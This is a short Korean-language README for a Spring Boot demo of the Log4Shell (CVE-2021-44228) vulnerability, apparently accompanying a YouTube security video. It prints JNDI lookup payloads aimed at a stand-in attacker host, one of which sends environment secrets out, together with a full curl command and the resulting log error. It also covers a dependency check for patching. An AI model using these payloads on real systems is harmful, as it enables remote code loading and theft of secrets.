
Log4Shell (CVE-2021-44228)은 Log4j의 제로데이 취약점입니다.
발견일: 2021년 11월 24일
패치일: 2021년 12월 6일
아래를 클릭하여 YouTube 동영상 보기
이 샘플 애플리케이션은 Spring Boot 애플리케이션이며, log4j를 로깅 프레임워크로 사용하고 있으며, localhost의 8080 포트에서 다음 환경 변수로 실행됩니다.
영상 설명 확인:
환경 변수
key=jason.bourne;secret=Treadstone
POST http://localhost:8080//v1/public/log-test
파라미터:
value=${jndi:ldap://some-random-hacking-site.com}

다음 문자열을 사용하여 환경 변수를 가져올 수 있습니다
value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}
curl -X POST -H 'Content-Type: application/x-www-form-urlencoded' -i http://localhost:8080/v1/public/log-test --data 'value=${jndi:ldap://some-random-hacking-site.com}/${env:key}/${env:secret}'
2021-12-25 10:47:58,112 http-nio-8080-exec-1 WARN Error looking up JNDI resource [ldap://some-random-hacking-site.com]. javax.naming.CommunicationException: some-random-hacking-site:389 [Root exception is java.net.ConnectException: Connection timed out: connect] at com.sun.jndi.ldap.Connection.<init>(Connection.java:243) at com.sun.jndi.ldap.LdapClient.<init>(LdapClient.java:137) at com.sun.jndi.ldap.LdapClient.getInstance(LdapClient.java:1615)
https://spring.io/blog/2021/12/10/log4j2-vulnerability-and-spring-boot
mvn dependency:tree
종속 jar 중 취약한 log4j 버전을 가리키는 것이 없는지 확인하세요.
Techflix YouTube 보안 재생 목록
https://www.youtube.com/watch?v=bb6pgWrm7tA&list=PLLqjNYIgOqeQl6NaeIeUhvNcWdpOVNkRi&index=1